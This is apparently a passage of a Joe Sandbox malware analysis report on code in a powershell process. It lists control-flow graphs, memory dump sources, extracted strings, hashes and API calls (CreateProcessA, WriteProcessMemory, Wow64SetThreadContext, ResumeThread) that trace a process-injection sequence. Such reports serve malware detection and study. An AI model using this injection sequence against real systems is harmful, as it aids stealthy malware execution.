              control_flow_graph 699 2551f0-2554c9 708 2554d0-255538 699->708 709 2554cb 699->709 711 255549-2555af call 252fbc 708->711 712 25553a-255541 call 2577e6 708->712 709->708 719 2555b4-2555cb call 254e6c 711->719 713 255547-255548 712->713 713->711 721 2555d0-25563d call 251bb8 719->721 727 256076-25608d 721->727 728 256093-25609a 727->728 729 255642-2556d9 727->729 734 2556e3-25571a call 258bc0 729->734 735 25571c-25573c 734->735 736 255764-2557ce 735->736 737 25573e-255759 735->737 743 2557d5-255801 736->743 744 2557d0 736->744 737->736 746 255807-25585c 743->746 747 25588b-2558e0 743->747 744->743 752 255884-255886 746->752 753 25585e-255879 746->753 754 2558e2-2558fd 747->754 755 255908 747->755 756 255909-255913 752->756 753->752 754->755 755->756 759 255915 756->759 760 25591a-255984 756->760 759->760 765 255986-2559a1 760->765 766 2559ac-2559c5 760->766 765->766 767 2559c7-255a15 766->767 768 255a3d-255af2 766->768 767->768 775 255a17-255a32 767->775 779 255af4-255b04 768->779 780 255b1a-255b1f 768->780 775->768 785 255b0f 779->785 782 255b29-255b59 call 258828 780->782 784 255b5b-255b7b 782->784 786 255ba3-255bde 784->786 787 255b7d-255b98 784->787 785->780 790 255d5e-255d7d 786->790 787->786 791 255be3-255c70 790->791 792 255d83-255da5 790->792 800 255c76-255cc1 791->800 801 255d50-255d58 791->801 797 255daf-255ddc call 258828 792->797 799 255dde-255dfe 797->799 802 255e26-255e5c 799->802 803 255e00-255e1b 799->803 813 255ccb-255d05 call 258828 800->813 801->790 807 255e67-255e7d 802->807 808 255e5e-255e61 802->808 803->802 810 255e84-255eaf 807->810 811 255e7f 807->811 808->807 815 255eb5-255ebb 810->815 816 255f39-255f8e 810->816 811->810 817 255d07-255d27 813->817 821 255ec5-255ee5 815->821 827 255fb6 816->827 828 255f90-255fab 816->828 819 255d4f 817->819 820 255d29-255d44 817->820 819->801 820->819 848 255ee8 call 2585d0 821->848 849 255ee8 call 2585c9 821->849 822 255eea-255f0a 825 255f32-255f34 822->825 826 255f0c-255f27 822->826 830 255fb7-255fbc 825->830 826->825 827->830 828->827 833 255fc6-255fe3 call 2584e0 830->833 836 255fe5-256005 833->836 837 256007-256022 836->837 838 25602d-256071 836->838 837->838 838->727 838->728 848->822 849->822
              Memory Dump Source
              • Source File: 0000000C.00000002.465921187.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_250000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 2d48a33baa30746be7c1cc95ef187e51423e53d6c2a665d462c786eb345bd872
              • Instruction ID: 6bbbdbae31fcbdae1c30f0a051ac33a6f9a4137005ea793f879bb366689a8174
              • Opcode Fuzzy Hash: 2d48a33baa30746be7c1cc95ef187e51423e53d6c2a665d462c786eb345bd872
              • Instruction Fuzzy Hash: 67713C71D0A3988FDB16DF25D8616C9BFB1AF8A300F0580EBD488AB262DB345D85CF55
              Function 00382BCC Relevance: 9.1, Strings: 7, Instructions: 329COMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 0 382bcc-382bcf 1 382bd1-382bd3 0->1 2 382bd5-382bdd 0->2 1->2 3 382bdf-382be5 2->3 4 382bf5-382bf9 2->4 5 382be9-382bf3 3->5 6 382be7 3->6 7 382bff-382c03 4->7 8 382d24-382d2e 4->8 5->4 6->4 9 382c43 7->9 10 382c05-382c16 7->10 11 382d3c-382d42 8->11 12 382d30-382d39 8->12 13 382c45-382c47 9->13 21 382d7c-382d88 10->21 22 382c1c-382c21 10->22 15 382d48-382d54 11->15 16 382d44-382d46 11->16 13->8 17 382c4d-382c51 13->17 19 382d56-382d79 15->19 16->19 17->8 20 382c57-382c5b 17->20 20->8 25 382c61-382c87 20->25 32 382d8a 21->32 33 382d8c-382dcb 21->33 26 382c39-382c41 22->26 27 382c23-382c29 22->27 25->8 46 382c8d-382c91 25->46 26->13 29 382c2b 27->29 30 382c2d-382c37 27->30 29->26 30->26 32->33 36 382fce-382fd4 33->36 37 382dd1-382dd6 33->37 38 382dd8-382dde 37->38 39 382dee-382df2 37->39 44 382de0 38->44 45 382de2-382dec 38->45 42 382df8-382dfa 39->42 43 382f77-382f81 39->43 47 382e0a 42->47 48 382dfc-382e08 42->48 49 382f8d-382f93 43->49 50 382f83-382f8a 43->50 44->39 45->39 51 382c93-382c9c 46->51 52 382cb4 46->52 53 382e0c-382e0e 47->53 48->53 55 382f99-382fa5 49->55 56 382f95-382f97 49->56 58 382c9e-382ca1 51->58 59 382ca3-382cb0 51->59 54 382cb7-382cc4 52->54 53->43 61 382e14-382e33 53->61 64 382cca-382d21 54->64 62 382fa7-382fcb 55->62 56->62 60 382cb2 58->60 59->60 60->54 71 382e43 61->71 72 382e35-382e41 61->72 73 382e45-382e47 71->73 72->73 73->43 74 382e4d-382e51 73->74 74->43 75 382e57-382e5b 74->75 76 382e5d-382e6c 75->76 77 382e6e 75->77 78 382e70-382e72 76->78 77->78 78->43 79 382e78-382e7c 78->79 79->43 80 382e82-382ea1 79->80 83 382eb9-382ec4 80->83 84 382ea3-382ea9 80->84 87 382ed3-382eef 83->87 88 382ec6-382ec9 83->88 85 382eab 84->85 86 382ead-382eaf 84->86 85->83 86->83 89 382f0c-382f16 87->89 90 382ef1-382f04 87->90 88->87 91 382f18 89->91 92 382f1a-382f68 89->92 90->89 93 382f6d-382f74 91->93 92->93
              Strings
              Memory Dump Source
              • Source File: 0000000C.00000002.466003822.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_380000_powershell.jbxd
              Similarity
              • API ID:
              • String ID: $&#$$&#$L4#p$L4#p$L4#p$d.#$d.#
              • API String ID: 0-2051439108
              • Opcode ID: ec9fb2ed233f31cb497bd75b36eb72ef7bbe32bc35bd442b948bee8eada22854
              • Instruction ID: b79c79f5f0e85091d7bcab17b2f4afcc657ef535f49af3bba8898f95ab848cc3
              • Opcode Fuzzy Hash: ec9fb2ed233f31cb497bd75b36eb72ef7bbe32bc35bd442b948bee8eada22854
              • Instruction Fuzzy Hash: 9BB10335B00344EFDB2BAF64C8407BF7BA2AF84310F1584AAE9158B2A1DB71DD45CB91
              Function 00380F20 Relevance: 7.8, Strings: 6, Instructions: 306COMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 100 380f20-380f45 101 3811ba-3811ed 100->101 102 380f4b-380f50 100->102 117 38120c 101->117 118 3811ef-38120a 101->118 103 380f68-380f6c 102->103 104 380f52-380f58 102->104 107 380f72-380f76 103->107 108 381167-381171 103->108 105 380f5a 104->105 106 380f5c-380f66 104->106 105->103 106->103 110 380f78-380f87 107->110 111 380f89 107->111 113 38117f-381185 108->113 114 381173-38117c 108->114 116 380f8b-380f8d 110->116 111->116 119 38118b-381197 113->119 120 381187-381189 113->120 116->108 122 380f93-380fb3 116->122 121 38120e-381210 117->121 118->121 123 381199-3811b7 119->123 120->123 125 3812e6-3812f0 121->125 126 381216-38121a 121->126 143 380fd2 122->143 144 380fb5-380fd0 122->144 131 3812fb-381301 125->131 132 3812f2-3812f8 125->132 128 38123a 126->128 129 38121c-381238 126->129 136 38123c-38123e 128->136 129->136 134 381303-381305 131->134 135 381307-381313 131->135 140 381315-381330 134->140 135->140 136->125 141 381244-381263 136->141 158 38127d-3812a2 141->158 159 381265-38126b 141->159 146 380fd4-380fd6 143->146 144->146 146->108 151 380fdc-380fde 146->151 152 380fee 151->152 153 380fe0-380fec 151->153 157 380ff0-380ff2 152->157 153->157 157->108 162 380ff8-381017 157->162 167 3812a4-3812ad 158->167 168 3812c5 158->168 160 38126d 159->160 161 38126f-38127b 159->161 160->158 161->158 171 381019-381025 162->171 172 381027 162->172 173 3812af-3812b2 167->173 174 3812b4-3812c1 167->174 170 3812c8-3812e0 168->170 170->125 175 381029-38102b 171->175 172->175 176 3812c3 173->176 174->176 175->108 178 381031-381053 175->178 176->170 182 38106b-3810d0 178->182 183 381055-38105b 178->183 189 3810e8-3810ec 182->189 190 3810d2-3810d8 182->190 184 38105d 183->184 185 38105f-381061 183->185 184->182 185->182 193 3810f3-3810f5 189->193 191 3810da 190->191 192 3810dc-3810de 190->192 191->189 192->189 194 38110d-381164 193->194 195 3810f7-3810fd 193->195 196 3810ff 195->196 197 381101-381103 195->197 196->194 197->194
              Strings
              Memory Dump Source
              • Source File: 0000000C.00000002.466003822.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_380000_powershell.jbxd
              Similarity
              • API ID:
              • String ID: D<1$D<1$D<1$D<1$h<1$h<1
              • API String ID: 0-1580266833
              • Opcode ID: 4a8f65e3e94bec2b95a1fa7f60aa68291490a99737600c4ec61e6a5a56f28f64
              • Instruction ID: 821debd1f8d6b77aed5f96858708e45d1094fe05ccbf9aee0be19c3e41e3e8d4
              • Opcode Fuzzy Hash: 4a8f65e3e94bec2b95a1fa7f60aa68291490a99737600c4ec61e6a5a56f28f64
              • Instruction Fuzzy Hash: DE9154B4700304DBDF2A6A74885077A77EA9FC5301F2584BAD906DB791EE76CC82C7A1
              Function 00380F01 Relevance: 5.1, Strings: 4, Instructions: 131COMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 199 380f01-380f45 201 3811ba-3811ed 199->201 202 380f4b-380f50 199->202 217 38120c 201->217 218 3811ef-38120a 201->218 203 380f68-380f6c 202->203 204 380f52-380f58 202->204 207 380f72-380f76 203->207 208 381167-381171 203->208 205 380f5a 204->205 206 380f5c-380f66 204->206 205->203 206->203 210 380f78-380f87 207->210 211 380f89 207->211 213 38117f-381185 208->213 214 381173-38117c 208->214 216 380f8b-380f8d 210->216 211->216 219 38118b-381197 213->219 220 381187-381189 213->220 216->208 222 380f93-380fb3 216->222 221 38120e-381210 217->221 218->221 223 381199-3811b7 219->223 220->223 225 3812e6-3812f0 221->225 226 381216-38121a 221->226 243 380fd2 222->243 244 380fb5-380fd0 222->244 231 3812fb-381301 225->231 232 3812f2-3812f8 225->232 228 38123a 226->228 229 38121c-381238 226->229 236 38123c-38123e 228->236 229->236 234 381303-381305 231->234 235 381307-381313 231->235 240 381315-381330 234->240 235->240 236->225 241 381244-381263 236->241 258 38127d-3812a2 241->258 259 381265-38126b 241->259 246 380fd4-380fd6 243->246 244->246 246->208 251 380fdc-380fde 246->251 252 380fee 251->252 253 380fe0-380fec 251->253 257 380ff0-380ff2 252->257 253->257 257->208 262 380ff8-381017 257->262 267 3812a4-3812ad 258->267 268 3812c5 258->268 260 38126d 259->260 261 38126f-38127b 259->261 260->258 261->258 271 381019-381025 262->271 272 381027 262->272 273 3812af-3812b2 267->273 274 3812b4-3812c1 267->274 270 3812c8-3812e0 268->270 270->225 275 381029-38102b 271->275 272->275 276 3812c3 273->276 274->276 275->208 278 381031-381053 275->278 276->270 282 38106b-3810d0 278->282 283 381055-38105b 278->283 289 3810e8-3810ec 282->289 290 3810d2-3810d8 282->290 284 38105d 283->284 285 38105f-381061 283->285 284->282 285->282 293 3810f3-3810f5 289->293 291 3810da 290->291 292 3810dc-3810de 290->292 291->289 292->289 294 38110d-381164 293->294 295 3810f7-3810fd 293->295 296 3810ff 295->296 297 381101-381103 295->297 296->294 297->294
              Strings
              Memory Dump Source
              • Source File: 0000000C.00000002.466003822.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_380000_powershell.jbxd
              Similarity
              • API ID:
              • String ID: D<1$D<1$D<1$D<1
              • API String ID: 0-2731855761
              • Opcode ID: ede11a1d59324e4885508d02e130f0111725bc261732f5711abff7db62620fc1
              • Instruction ID: 47ea8c9ed3af0251941a5bc264222e67d07a5fa34a5262f6220607665ae613e6
              • Opcode Fuzzy Hash: ede11a1d59324e4885508d02e130f0111725bc261732f5711abff7db62620fc1
              • Instruction Fuzzy Hash: C4416AB8304345DFDF2F7B21880027A77A95F45700F1680E6DA01EB692EB76CD86D761
              Function 003816D0 Relevance: 4.2, Strings: 3, Instructions: 448COMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 299 3816d0-3816df 300 3816ff 299->300 301 3816e1-3816fd 299->301 302 381701-381703 300->302 301->302 304 381709-381710 302->304 305 3817b0-3817ba 302->305 308 381808-38185b 304->308 309 381716-38171b 304->309 306 3817bc-3817c3 305->306 307 3817c6-3817cc 305->307 310 3817ce-3817d0 307->310 311 3817d2-3817de 307->311 320 381861-381866 308->320 321 381ac6-381b0e 308->321 313 38171d-381723 309->313 314 381733-381749 309->314 318 3817e0-3817fb 310->318 311->318 315 381725 313->315 316 381727-381731 313->316 314->308 323 38174f-38176f 314->323 315->314 316->314 325 381868-38186e 320->325 326 38187e-381882 320->326 335 381c7b-381c99 321->335 336 381b14-381b19 321->336 344 3817fe-381803 323->344 345 381775-38177c 323->345 328 381870 325->328 329 381872-38187c 325->329 331 381888-38188c 326->331 332 381a73-381a7d 326->332 328->326 329->326 339 38188e-38189d 331->339 340 38189f 331->340 337 381a8b-381a91 332->337 338 381a7f-381a88 332->338 342 381b1b-381b21 336->342 343 381b31-381b35 336->343 347 381a93-381a95 337->347 348 381a97-381aa3 337->348 341 3818a1-3818a3 339->341 340->341 341->332 349 3818a9-3818ab 341->349 351 381b23 342->351 352 381b25-381b2f 342->352 355 381c2a-381c34 343->355 356 381b3b-381b3d 343->356 344->345 353 38177e-381784 345->353 354 381796-3817aa 345->354 357 381aa5-381ac3 347->357 348->357 359 3818ca 349->359 360 3818ad-3818c8 349->360 351->343 352->343 362 381788-381794 353->362 363 381786 353->363 354->305 364 381c42-381c48 355->364 365 381c36-381c3f 355->365 366 381b4d 356->366 367 381b3f-381b4b 356->367 369 3818cc-3818ce 359->369 360->369 362->354 363->354 372 381c4a-381c4c 364->372 373 381c4e-381c5a 364->373 370 381b4f-381b51 366->370 367->370 369->332 376 3818d4-381900 369->376 370->355 377 381b57-381b59 370->377 378 381c5c-381c78 372->378 373->378 376->332 399 381906-381913 376->399 380 381b69 377->380 381 381b5b-381b67 377->381 386 381b6b-381b6d 380->386 381->386 386->355 387 381b73-381b75 386->387 388 381b8f-381b93 387->388 389 381b77-381b7d 387->389 394 381bad-381c27 388->394 395 381b95-381b9b 388->395 392 381b7f 389->392 393 381b81-381b8d 389->393 392->388 393->388 397 381b9d 395->397 398 381b9f-381bab 395->398 397->394 398->394 402 381919-38191e 399->402 403 3819ac-3819eb 399->403 405 381920-381926 402->405 406 381936-38194f 402->406 425 3819f2-381a01 403->425 408 381928 405->408 409 38192a-381934 405->409 406->403 414 381951-381973 406->414 408->406 409->406 418 38198d-381997 414->418 419 381975-38197b 414->419 423 38199c-3819aa 418->423 421 38197d 419->421 422 38197f-38198b 419->422 421->418 422->418 423->425 428 381a19-381a70 425->428 429 381a03-381a09 425->429 430 381a0b 429->430 431 381a0d-381a0f 429->431 430->428 431->428
              Strings
              Memory Dump Source
              • Source File: 0000000C.00000002.466003822.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_380000_powershell.jbxd
              Similarity
              • API ID:
              • String ID: @=1$@=1$@=1
              • API String ID: 0-1625691303
              • Opcode ID: 51c1cd21b83c280881711f52332315319fb38fe5c9a71f7ecf542e5a072bb548
              • Instruction ID: 6e706fb1b2067a51852d51b862c3e24968ff766e123c650d9bcd3a8b56b1d972
              • Opcode Fuzzy Hash: 51c1cd21b83c280881711f52332315319fb38fe5c9a71f7ecf542e5a072bb548
              • Instruction Fuzzy Hash: E9E1F435B04300DFDB26AB64C45077ABBEAAFC5310F2984EAE4499B391DB75CD42C7A1
              Function 0038106F Relevance: 2.5, Strings: 2, Instructions: 44COMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 576 38106f-3810d0 583 3810e8-3810ec 576->583 584 3810d2-3810d8 576->584 587 3810f3-3810f5 583->587 585 3810da 584->585 586 3810dc-3810de 584->586 585->583 586->583 588 38110d-381164 587->588 589 3810f7-3810fd 587->589 590 3810ff 589->590 591 381101-381103 589->591 590->588 591->588
              Strings
              Memory Dump Source
              • Source File: 0000000C.00000002.466003822.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_380000_powershell.jbxd
              Similarity
              • API ID:
              • String ID: D<1$D<1
              • API String ID: 0-3091184708
              • Opcode ID: c3f8a857e3fb3af01bcc4b87c5c3cc6d7f9e8cf5b25cff26f388f0e15ea6ba85
              • Instruction ID: fb7ca02de8d2da1cfd342dfe3e6dcb2bea3240ba50e1f2370efb8f5d88950f18
              • Opcode Fuzzy Hash: c3f8a857e3fb3af01bcc4b87c5c3cc6d7f9e8cf5b25cff26f388f0e15ea6ba85
              • Instruction Fuzzy Hash: 9F014978700300DBDF2ABB61880067DB359AB9C740B2180A6E915BB241DA378D43D759
              Function 00258BC0 Relevance: 1.8, APIs: 1, Instructions: 323processCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 593 258bc0-258c59 595 258ca2-258cca 593->595 596 258c5b-258c72 593->596 600 258d10-258d66 595->600 601 258ccc-258ce0 595->601 596->595 599 258c74-258c79 596->599 602 258c9c-258c9f 599->602 603 258c7b-258c85 599->603 610 258dac-258ea3 CreateProcessA 600->610 611 258d68-258d7c 600->611 601->600 608 258ce2-258ce7 601->608 602->595 605 258c87 603->605 606 258c89-258c98 603->606 605->606 606->606 609 258c9a 606->609 612 258ce9-258cf3 608->612 613 258d0a-258d0d 608->613 609->602 629 258ea5-258eab 610->629 630 258eac-258f91 610->630 611->610 619 258d7e-258d83 611->619 614 258cf5 612->614 615 258cf7-258d06 612->615 613->600 614->615 615->615 618 258d08 615->618 618->613 621 258d85-258d8f 619->621 622 258da6-258da9 619->622 623 258d91 621->623 624 258d93-258da2 621->624 622->610 623->624 624->624 625 258da4 624->625 625->622 629->630 642 258fa1-258fa5 630->642 643 258f93-258f97 630->643 645 258fb5-258fb9 642->645 646 258fa7-258fab 642->646 643->642 644 258f99 643->644 644->642 648 258fc9-258fcd 645->648 649 258fbb-258fbf 645->649 646->645 647 258fad 646->647 647->645 650 259003-25900e 648->650 651 258fcf-258ff8 648->651 649->648 652 258fc1 649->652 651->650 652->648
              APIs
              • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00258E87
              Memory Dump Source
              • Source File: 0000000C.00000002.465921187.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_250000_powershell.jbxd
              Similarity
              • API ID: CreateProcess
              • String ID:
              • API String ID: 963392458-0
              • Opcode ID: f975bc8dfa680192aa61e69df00a3749c7c6746ce529e2983915715f8129b42d
              • Instruction ID: a641d0d1004d3fcb2e35f18561ed25d4a4783df328c283b9d3d57ea5b16e7648
              • Opcode Fuzzy Hash: f975bc8dfa680192aa61e69df00a3749c7c6746ce529e2983915715f8129b42d
              • Instruction Fuzzy Hash: 06C13570D10219CFDB24CFA4C841BEDBBB1BF49301F1491A9E919B7280DBB49A99CF95
              Function 00258828 Relevance: 1.6, APIs: 1, Instructions: 118injectionCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 656 258828-258893 658 258895-2588a7 656->658 659 2588aa-258911 WriteProcessMemory 656->659 658->659 661 258913-258919 659->661 662 25891a-25896c 659->662 661->662
              APIs
              • WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 002588FB
              Memory Dump Source
              • Source File: 0000000C.00000002.465921187.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_250000_powershell.jbxd
              Similarity
              • API ID: MemoryProcessWrite
              • String ID:
              • API String ID: 3559483778-0
              • Opcode ID: 976825728ff30e6bc04c40831f59db6f3e57e3ba8d52941fcc86e25592df88bb
              • Instruction ID: c7c5852faac483d383c22c6f63fa0c4f0c91f5a65148ff6f9e66e79039ba0aba
              • Opcode Fuzzy Hash: 976825728ff30e6bc04c40831f59db6f3e57e3ba8d52941fcc86e25592df88bb
              • Instruction Fuzzy Hash: B241ABB4D00249DFCF00CFA9D984AEEBBF1BB49314F24942AE818B7250D775AA55CF64
              Function 002585C9 Relevance: 1.6, APIs: 1, Instructions: 101threadCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 667 2585c9-258630 670 258647-258695 Wow64SetThreadContext 667->670 671 258632-258644 667->671 673 258697-25869d 670->673 674 25869e-2586ea 670->674 671->670 673->674
              APIs
              • Wow64SetThreadContext.KERNEL32(?,?), ref: 0025867F
              Memory Dump Source
              • Source File: 0000000C.00000002.465921187.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_250000_powershell.jbxd
              Similarity
              • API ID: ContextThreadWow64
              • String ID:
              • API String ID: 983334009-0
              • Opcode ID: 589b5db16b0c9e5e2c633e2043207c70ddaed4ef890cf6de1b6b9529109804bb
              • Instruction ID: c85301274bf9b4f6e5ae5760cbc853e021f3d8c20c432b9ee93f9a1952fa8267
              • Opcode Fuzzy Hash: 589b5db16b0c9e5e2c633e2043207c70ddaed4ef890cf6de1b6b9529109804bb
              • Instruction Fuzzy Hash: B741B0B5D102599FDB10CFA9D984AEEBBB5BB48314F24802AE414B7240D778AA49CF54
              Function 002585D0 Relevance: 1.6, APIs: 1, Instructions: 96threadCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 679 2585d0-258630 681 258647-258695 Wow64SetThreadContext 679->681 682 258632-258644 679->682 684 258697-25869d 681->684 685 25869e-2586ea 681->685 682->681 684->685
              APIs
              • Wow64SetThreadContext.KERNEL32(?,?), ref: 0025867F
              Memory Dump Source
              • Source File: 0000000C.00000002.465921187.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_250000_powershell.jbxd
              Similarity
              • API ID: ContextThreadWow64
              • String ID:
              • API String ID: 983334009-0
              • Opcode ID: ef78ef4b5d8ac9b5cc40ee76515d805d81f9b1b63cb3f6745fd763e8edff92be
              • Instruction ID: 1e7fc26371dc16bfe65da72b9db5a92c124744453b7fff0055912712c7011ed7
              • Opcode Fuzzy Hash: ef78ef4b5d8ac9b5cc40ee76515d805d81f9b1b63cb3f6745fd763e8edff92be
              • Instruction Fuzzy Hash: 6141CFB4D10259DFDB10CFA9D984AEEBBF5BF48314F24802AE814B7240D778A949CF54
              Function 002584E0 Relevance: 1.6, APIs: 1, Instructions: 75threadCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 690 2584e0-258574 ResumeThread 693 258576-25857c 690->693 694 25857d-2585bf 690->694 693->694
              APIs
              Memory Dump Source
              • Source File: 0000000C.00000002.465921187.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_250000_powershell.jbxd
              Similarity
              • API ID: ResumeThread
              • String ID:
              • API String ID: 947044025-0
              • Opcode ID: e5aa8ab67ef247ef51151cd92e25295d996383e11fd28c001a15ae07416e3f6e
              • Instruction ID: c13eba071ccd5e3936bd5aeb252445d41a82aa63510e95ca3bb0db25794dc2c4
              • Opcode Fuzzy Hash: e5aa8ab67ef247ef51151cd92e25295d996383e11fd28c001a15ae07416e3f6e
              • Instruction Fuzzy Hash: E931B9B4D102199FCB10CFA9D984AEEFBB4AB89314F24942AE814B7210D775A905CF98
              Function 001DD01D Relevance: .0, Instructions: 45COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.465848908.00000000001DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001DD000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_1dd000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 44845337617e2ff5d90f406eec7dc88047b6f2e873877bbc96df61de4a56c2c0
              • Instruction ID: 20328febbfb711e68c8a362ca532cd5aea0a50f7466b8066b1cb3a0f109760b0
              • Opcode Fuzzy Hash: 44845337617e2ff5d90f406eec7dc88047b6f2e873877bbc96df61de4a56c2c0
              • Instruction Fuzzy Hash: 56018F71508340EAE7248A25EC84B66BB98DFC17A4F28C55BED490B282C3799945CAB1
              Function 001DD006 Relevance: .0, Instructions: 43COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.465848908.00000000001DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001DD000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_1dd000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 52b48ee043968f522a4bb1e8c333e43e1d16485e4a5a1ce56be7a117f3a4945e
              • Instruction ID: 6d0acac90d6b1fc77f536d694bbaedc1fa19f895ff17cecc51f39f19346c9db9
              • Opcode Fuzzy Hash: 52b48ee043968f522a4bb1e8c333e43e1d16485e4a5a1ce56be7a117f3a4945e
              • Instruction Fuzzy Hash: ED015E6140D3C09FD7128B259C94B52BFA4DF92624F19C1DBE9888F2A3C2699848C772
              Function 0038270F Relevance: .0, Instructions: 23COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.466003822.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_380000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 219a3ff682b055aa9b6916d18537342e7f98d2483621ba9ecaa4b409eab09842
              • Instruction ID: e7e5b8fa8074c1af825ebb2ce69080e10f18a656b314b7fde3182488664c9828
              • Opcode Fuzzy Hash: 219a3ff682b055aa9b6916d18537342e7f98d2483621ba9ecaa4b409eab09842
              • Instruction Fuzzy Hash: 43E0D831704344CFEF2B766194213AF77916FA2250F1140D6E89097657CA348905C322

              Non-executed Functions

              Function 003800A0 Relevance: 16.7, Strings: 13, Instructions: 402COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 0000000C.00000002.466003822.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_380000_powershell.jbxd
              Similarity
              • API ID:
              • String ID: (:1$(:1$(:1$0'%$L4#p$L4#p$L4#p$L4#p$L4#p$L4#p$L:1$L:1$L:1
              • API String ID: 0-230141455
              • Opcode ID: 9f6cb60c940f89ab4d044e57ab4317cd53dddbe409f1d5b17e24473e56e1f9c7
              • Instruction ID: 05ed5b2ee6354937af0830c5e5d19f8f159bf3869a18463e95704496b222d492
              • Opcode Fuzzy Hash: 9f6cb60c940f89ab4d044e57ab4317cd53dddbe409f1d5b17e24473e56e1f9c7
              • Instruction Fuzzy Hash: 42D18834700304EFDF1AAF64C8547BE7BA2AFC5310F1584AAE9059B291DBB4DD49CBA1
              Function 00380001 Relevance: 6.4, Strings: 5, Instructions: 162COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 0000000C.00000002.466003822.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_380000_powershell.jbxd
              Similarity
              • API ID:
              • String ID: (:1$(:1$L4#p$L4#p$L4#p
              • API String ID: 0-1475531743
              • Opcode ID: 53a992d36f7fd679402aabc83c6bb334d068cf963cf0077e5d5626945e27b4e3
              • Instruction ID: 3801cf1cc1eff4520a6ea0106108e834af71c8f2c2a1e1d436d5b698ba851be4
              • Opcode Fuzzy Hash: 53a992d36f7fd679402aabc83c6bb334d068cf963cf0077e5d5626945e27b4e3
              • Instruction Fuzzy Hash: 8351F6B4608384EFDB1BAB2088147693FB59F47310F1A81E7D8419F1A3D7B49D88CB62
              Function 00380081 Relevance: 6.4, Strings: 5, Instructions: 126COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 0000000C.00000002.466003822.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_380000_powershell.jbxd
              Similarity
              • API ID:
              • String ID: (:1$(:1$L4#p$L4#p$L4#p
              • API String ID: 0-1475531743
              • Opcode ID: e2270523a5ea28c5d453aa64bcc10ef29c0f72bc2ba463ce076c52f7a6bb0023
              • Instruction ID: ac7e28c18b4ee930f2a1239fffcecb5fb8f3b493612a67186ef6439222182e13
              • Opcode Fuzzy Hash: e2270523a5ea28c5d453aa64bcc10ef29c0f72bc2ba463ce076c52f7a6bb0023
              • Instruction Fuzzy Hash: 4C410675604348EFDF2AAF14C8487BD7BB6AF45310F5A81E6E800AB291D7B4DD88CB51
              Function 003802E5 Relevance: 6.4, Strings: 5, Instructions: 118COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
